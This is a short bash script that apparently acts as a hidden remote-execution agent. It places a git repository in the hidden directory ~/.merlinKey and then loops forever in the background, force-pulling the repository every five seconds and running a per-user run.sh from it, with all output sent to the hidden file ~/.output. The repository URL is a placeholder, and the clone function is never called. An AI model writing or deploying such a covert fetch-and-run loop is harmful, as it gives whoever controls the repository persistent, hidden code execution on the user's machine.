#!/bin/bash

repo_dir="$HOME/.merlinKey"

clone_repo() {
    if [ ! -d "$repo_dir" ]; then
        git clone <repository_url> "$repo_dir"
    fi
}

git_pull() {
    cd "$repo_dir" || exit
    git reset --hard HEAD > ~/.output
    git pull >> ~/.output 2>&1
}

chmod_script() {
    chmod +x "$repo_dir/$USER/run.sh"
}

run_script() {
    "$repo_dir/$USER/run.sh" > ~/.output &
}

main() {
    while true; do
        git_pull
        chmod_script
        run_script
        sleep 5
    done
}

main > ~/.output &
